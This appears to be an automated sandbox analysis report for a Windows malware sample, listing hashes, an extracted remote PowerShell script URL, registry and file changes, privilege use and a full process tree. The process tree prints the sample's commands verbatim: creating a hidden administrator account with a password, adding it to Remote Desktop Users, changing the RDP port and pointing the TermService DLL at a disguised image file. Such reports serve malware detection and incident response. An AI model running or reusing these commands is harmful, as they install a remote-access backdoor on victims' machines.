Analysis
max time kernel: 110s
max time network: 120s
platform: windows10_x64
resource: win10-en-20211104
submitted: 05-12-2021 07:50
Static task: static1
Behavioral task: behavioral1
  Sample: f616975d69da372f403d58ba955dc510.exe
  Resource: win7-en-20211014
Behavioral task: behavioral2
  Sample: f616975d69da372f403d58ba955dc510.exe
  Resource: win10-en-20211104
General
Target: f616975d69da372f403d58ba955dc510.exe
Size: 4.6MB
MD5: f616975d69da372f403d58ba955dc510
SHA1: e22fcb3ec811cba8d74d4f897d495f21e8c88224
SHA256: 65f47cd450bd96cba40e838cb0355638a1d43b3ac51d3d6e97a469d5425a7874
SHA512: 2be545ed1a330f76ff21e3f8406b4982b86a432065264fd88008ab762bf2fafb0f892cbee2b395cdd62c6be98ce02868223331bf1f3e9402cde6f366ca8c49e5
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
flow  pid   process
29    2420  powershell.exe
31    2420  powershell.exe
32    2420  powershell.exe
33    2420  powershell.exe
35    2420  powershell.exe
37    2420  powershell.exe
39    2420  powershell.exe
41    2420  powershell.exe
43    2420  powershell.exe
-
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource                        yara_rule
\Windows\Branding\mediasrv.png  upx
\Windows\Branding\mediasvc.png  upx
-
Loads dropped DLL 2 IoCs
Processes:
pid   process
2148
2148
-
Drops file in Program Files directory 4 IoCs
Processes:
description                   ioc                                                                           process
File opened for modification  C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI   powershell.exe
File opened for modification  C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT     powershell.exe
File opened for modification  C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI     powershell.exe
File opened for modification  C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT   powershell.exe
-
Drops file in Windows directory 19 IoCs
Processes:
description                   ioc                                                                                                          process
File created                  C:\Windows\branding\mediasvc.png                                                                             powershell.exe
File opened for modification  C:\Windows\branding\wupsvc.jpg                                                                               powershell.exe
File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_zeljy0yw.ztl.ps1            powershell.exe
File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE6EA.tmp                                                  powershell.exe
File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log      powershell.exe
File created                  C:\Windows\branding\wupsvc.jpg                                                                               powershell.exe
File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_tzsnjt1h.4qc.psm1           powershell.exe
File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE63A.tmp                                                  powershell.exe
File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat            powershell.exe
File opened for modification  C:\Windows\branding\mediasvc.png                                                                             powershell.exe
File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE689.tmp                                                  powershell.exe
File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE69A.tmp                                                  powershell.exe
File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE6D9.tmp                                                  powershell.exe
File created                  C:\Windows\branding\mediasrv.png                                                                             powershell.exe
File opened for modification  C:\Windows\branding\Basebrd                                                                                  powershell.exe
File opened for modification  C:\Windows\branding\ShellBrd                                                                                 powershell.exe
File opened for modification  C:\Windows\branding\mediasrv.png                                                                             powershell.exe
File created                  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP                                                 powershell.exe
File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive  powershell.exe
-
Modifies data under HKEY_USERS 64 IoCs
Processes:
description       ioc  process
Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople  powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\  WMIC.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4  powershell.exe
Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites"  powershell.exe
Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\CurrentLevel = "0"  powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs  powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0  powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones  powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion  powershell.exe
Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer"  powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates  powershell.exe
Set value (data)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000  powershell.exe
Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422"  powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones  powershell.exe
Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426"  powershell.exe
Set value (data)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = d17a577ee8d1d701  powershell.exe
Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]"  powershell.exe
Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data."  powershell.exe
Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0"  powershell.exe
Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3"  powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates  powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0  powershell.exe
Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0"  powershell.exe
Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3"  powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs  powershell.exe
Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0"  powershell.exe
Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219"  powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0  powershell.exe
Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424"  powershell.exe
Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481"  powershell.exe
Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016"  powershell.exe
Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]"  powershell.exe
Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]"  powershell.exe
Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219"  powershell.exe
Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3"  powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges  powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA  powershell.exe
Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]"  powershell.exe
Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."  powershell.exe
Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33"  powershell.exe
Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0"  powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections  powershell.exe
Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."  powershell.exe
Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0"  powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E  powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache  powershell.exe
Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet"  powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1  powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates  powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs  powershell.exe
Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912"  powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains  powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache  powershell.exe
Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer"  powershell.exe
Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\  powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0  powershell.exe
Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data."  powershell.exe
Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0"  powershell.exe
Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\  powershell.exe
Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]"  powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs  powershell.exe
Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\  powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates  powershell.exe
Set value (data)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000  powershell.exe
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description             flow  ioc
HTTP User-Agent header  31    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header  32    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header  33    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header  35    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
-
Suspicious behavior: EnumeratesProcesses 15 IoCs
Processes:
pid   process
3952  powershell.exe
3952  powershell.exe
3952  powershell.exe
3440  powershell.exe
3440  powershell.exe
3440  powershell.exe
1524  powershell.exe
1524  powershell.exe
1524  powershell.exe
3952  powershell.exe
3952  powershell.exe
3952  powershell.exe
2420  powershell.exe
2420  powershell.exe
2420  powershell.exe
-
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid   process
632
632
-
Suspicious use of AdjustPrivilegeToken 58 IoCs
Processes:
description                           pid   process
Token: SeDebugPrivilege               3952  powershell.exe
Token: SeDebugPrivilege               3440  powershell.exe
Token: SeIncreaseQuotaPrivilege       3440  powershell.exe
Token: SeSecurityPrivilege            3440  powershell.exe
Token: SeTakeOwnershipPrivilege       3440  powershell.exe
Token: SeLoadDriverPrivilege          3440  powershell.exe
Token: SeSystemProfilePrivilege       3440  powershell.exe
Token: SeSystemtimePrivilege          3440  powershell.exe
Token: SeProfSingleProcessPrivilege   3440  powershell.exe
Token: SeIncBasePriorityPrivilege     3440  powershell.exe
Token: SeCreatePagefilePrivilege      3440  powershell.exe
Token: SeBackupPrivilege              3440  powershell.exe
Token: SeRestorePrivilege             3440  powershell.exe
Token: SeShutdownPrivilege            3440  powershell.exe
Token: SeDebugPrivilege               3440  powershell.exe
Token: SeSystemEnvironmentPrivilege   3440  powershell.exe
Token: SeRemoteShutdownPrivilege      3440  powershell.exe
Token: SeUndockPrivilege              3440  powershell.exe
Token: SeManageVolumePrivilege        3440  powershell.exe
Token: 33                             3440  powershell.exe
Token: 34                             3440  powershell.exe
Token: 35                             3440  powershell.exe
Token: 36                             3440  powershell.exe
Token: SeDebugPrivilege               1524  powershell.exe
Token: SeIncreaseQuotaPrivilege       1524  powershell.exe
Token: SeSecurityPrivilege            1524  powershell.exe
Token: SeTakeOwnershipPrivilege       1524  powershell.exe
Token: SeLoadDriverPrivilege          1524  powershell.exe
Token: SeSystemProfilePrivilege       1524  powershell.exe
Token: SeSystemtimePrivilege          1524  powershell.exe
Token: SeProfSingleProcessPrivilege   1524  powershell.exe
Token: SeIncBasePriorityPrivilege     1524  powershell.exe
Token: SeCreatePagefilePrivilege      1524  powershell.exe
Token: SeBackupPrivilege              1524  powershell.exe
Token: SeRestorePrivilege             1524  powershell.exe
Token: SeShutdownPrivilege            1524  powershell.exe
Token: SeDebugPrivilege               1524  powershell.exe
Token: SeSystemEnvironmentPrivilege   1524  powershell.exe
Token: SeRemoteShutdownPrivilege      1524  powershell.exe
Token: SeUndockPrivilege              1524  powershell.exe
Token: SeManageVolumePrivilege        1524  powershell.exe
Token: 33                             1524  powershell.exe
Token: 34                             1524  powershell.exe
Token: 35                             1524  powershell.exe
Token: 36                             1524  powershell.exe
Token: SeAssignPrimaryTokenPrivilege  3144  WMIC.exe
Token: SeIncreaseQuotaPrivilege       3144  WMIC.exe
Token: SeAuditPrivilege               3144  WMIC.exe
Token: SeAssignPrimaryTokenPrivilege  3144  WMIC.exe
Token: SeIncreaseQuotaPrivilege       3144  WMIC.exe
Token: SeAuditPrivilege               3144  WMIC.exe
Token: SeAssignPrimaryTokenPrivilege  2084  WMIC.exe
Token: SeIncreaseQuotaPrivilege       2084  WMIC.exe
Token: SeAuditPrivilege               2084  WMIC.exe
Token: SeAssignPrimaryTokenPrivilege  2084  WMIC.exe
Token: SeIncreaseQuotaPrivilege       2084  WMIC.exe
Token: SeAuditPrivilege               2084  WMIC.exe
Token: SeDebugPrivilege               2420  powershell.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description                       pid   process                               target process
PID 3460 wrote to memory of 3952  3460  f616975d69da372f403d58ba955dc510.exe  powershell.exe
PID 3460 wrote to memory of 3952  3460  f616975d69da372f403d58ba955dc510.exe  powershell.exe
PID 3952 wrote to memory of 2568  3952  powershell.exe                        csc.exe
PID 3952 wrote to memory of 2568  3952  powershell.exe                        csc.exe
PID 2568 wrote to memory of 1064  2568  csc.exe                               cvtres.exe
PID 2568 wrote to memory of 1064  2568  csc.exe                               cvtres.exe
PID 3952 wrote to memory of 712   3952  powershell.exe                        csc.exe
PID 3952 wrote to memory of 712   3952  powershell.exe                        csc.exe
PID 712 wrote to memory of 1516   712   csc.exe                               cvtres.exe
PID 712 wrote to memory of 1516   712   csc.exe                               cvtres.exe
PID 3952 wrote to memory of 3440  3952  powershell.exe                        powershell.exe
PID 3952 wrote to memory of 3440  3952  powershell.exe                        powershell.exe
PID 3952 wrote to memory of 1524  3952  powershell.exe                        powershell.exe
PID 3952 wrote to memory of 1524  3952  powershell.exe                        powershell.exe
PID 3952 wrote to memory of 1532  3952  powershell.exe                        powershell.exe
PID 3952 wrote to memory of 1532  3952  powershell.exe                        powershell.exe
PID 3952 wrote to memory of 724   3952  powershell.exe                        reg.exe
PID 3952 wrote to memory of 724   3952  powershell.exe                        reg.exe
PID 3952 wrote to memory of 3672  3952  powershell.exe                        reg.exe
PID 3952 wrote to memory of 3672  3952  powershell.exe                        reg.exe
PID 3952 wrote to memory of 1800  3952  powershell.exe                        reg.exe
PID 3952 wrote to memory of 1800  3952  powershell.exe                        reg.exe
PID 3952 wrote to memory of 400   3952  powershell.exe                        net.exe
PID 3952 wrote to memory of 400   3952  powershell.exe                        net.exe
PID 400 wrote to memory of 2064   400   net.exe                               net1.exe
PID 400 wrote to memory of 2064   400   net.exe                               net1.exe
PID 3952 wrote to memory of 2256  3952  powershell.exe                        cmd.exe
PID 3952 wrote to memory of 2256  3952  powershell.exe                        cmd.exe
PID 2256 wrote to memory of 2448  2256  cmd.exe                               cmd.exe
PID 2256 wrote to memory of 2448  2256  cmd.exe                               cmd.exe
PID 2448 wrote to memory of 3696  2448  cmd.exe                               net.exe
PID 2448 wrote to memory of 3696  2448  cmd.exe                               net.exe
PID 3696 wrote to memory of 3056  3696  net.exe                               net1.exe
PID 3696 wrote to memory of 3056  3696  net.exe                               net1.exe
PID 3952 wrote to memory of 3500  3952  powershell.exe                        cmd.exe
PID 3952 wrote to memory of 3500  3952  powershell.exe                        cmd.exe
PID 3500 wrote to memory of 1976  3500  cmd.exe                               cmd.exe
PID 3500 wrote to memory of 1976  3500  cmd.exe                               cmd.exe
PID 1976 wrote to memory of 1244  1976  cmd.exe                               net.exe
PID 1976 wrote to memory of 1244  1976  cmd.exe                               net.exe
PID 1244 wrote to memory of 3780  1244  net.exe                               net1.exe
PID 1244 wrote to memory of 3780  1244  net.exe                               net1.exe
PID 1944 wrote to memory of 3152  1944  cmd.exe                               net.exe
PID 1944 wrote to memory of 3152  1944  cmd.exe                               net.exe
PID 3152 wrote to memory of 2180  3152  net.exe                               net1.exe
PID 3152 wrote to memory of 2180  3152  net.exe                               net1.exe
PID 2948 wrote to memory of 2212  2948  cmd.exe                               net.exe
PID 2948 wrote to memory of 2212  2948  cmd.exe                               net.exe
PID 2212 wrote to memory of 2188  2212  net.exe                               net1.exe
PID 2212 wrote to memory of 2188  2212  net.exe                               net1.exe
PID 2244 wrote to memory of 4008  2244  cmd.exe                               net.exe
PID 2244 wrote to memory of 4008  2244  cmd.exe                               net.exe
PID 4008 wrote to memory of 352   4008  net.exe                               net1.exe
PID 4008 wrote to memory of 352   4008  net.exe                               net1.exe
PID 976 wrote to memory of 656    976   cmd.exe                               net.exe
PID 976 wrote to memory of 656    976   cmd.exe                               net.exe
PID 656 wrote to memory of 2540   656   net.exe                               net1.exe
PID 656 wrote to memory of 2540   656   net.exe                               net1.exe
PID 2264 wrote to memory of 696   2264  cmd.exe                               net.exe
PID 2264 wrote to memory of 696   2264  cmd.exe                               net.exe
PID 696 wrote to memory of 4068   696   net.exe                               net1.exe
PID 696 wrote to memory of 4068   696   net.exe                               net1.exe
PID 3788 wrote to memory of 1924  3788  cmd.exe                               net.exe
PID 3788 wrote to memory of 1924  3788  cmd.exe                               net.exe
Processes
[1] C:\Users\Admin\AppData\Local\Temp\f616975d69da372f403d58ba955dc510.exe
    "C:\Users\Admin\AppData\Local\Temp\f616975d69da372f403d58ba955dc510.exe"
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
      - Drops file in Windows directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ysa2i5ni\ysa2i5ni.cmdline"
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA78B.tmp" "c:\Users\Admin\AppData\Local\Temp\ysa2i5ni\CSC27CACF1B9A6548F784A5D2794A43D262.TMP"
    [3] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tcsoktj1\tcsoktj1.cmdline"
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAD77.tmp" "c:\Users\Admin\AppData\Local\Temp\tcsoktj1\CSC2D2376043F0E43B4AAFAFCE07CD4643.TMP"
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    [3] C:\Windows\system32\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    [3] C:\Windows\system32\reg.exe
        "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
        - Modifies registry key
    [3] C:\Windows\system32\reg.exe
        "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    [3] C:\Windows\system32\net.exe
        "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe
          cmd /c net start rdpdr
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\net.exe
            net start rdpdr
            - Suspicious use of WriteProcessMemory
          [6] C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 start rdpdr
    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe
          cmd /c net start TermService
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\net.exe
            net start TermService
            - Suspicious use of WriteProcessMemory
          [6] C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 start TermService
    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
[1] C:\Windows\System32\cmd.exe
    cmd /C net.exe user wgautilacc Ghar4f5 /del
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      net.exe user wgautilacc Ghar4f5 /del
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
[1] C:\Windows\System32\cmd.exe
    cmd /C net.exe user wgautilacc iIAQ5Y1o /add
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      net.exe user wgautilacc iIAQ5Y1o /add
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 user wgautilacc iIAQ5Y1o /add
[1] C:\Windows\System32\cmd.exe
    cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
[1] C:\Windows\System32\cmd.exe
    cmd /C net.exe LOCALGROUP "Remote Desktop Users" LUCNJVHX$ /ADD
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      net.exe LOCALGROUP "Remote Desktop Users" LUCNJVHX$ /ADD
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" LUCNJVHX$ /ADD
[1] C:\Windows\System32\cmd.exe
    cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      net.exe LOCALGROUP "Administrators" wgautilacc /ADD
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
[1] C:\Windows\System32\cmd.exe
    cmd /C net.exe user wgautilacc iIAQ5Y1o
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      net.exe user wgautilacc iIAQ5Y1o
    [3] C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 user wgautilacc iIAQ5Y1o
[1] C:\Windows\System32\cmd.exe
    cmd.exe /C wmic path win32_VideoController get name
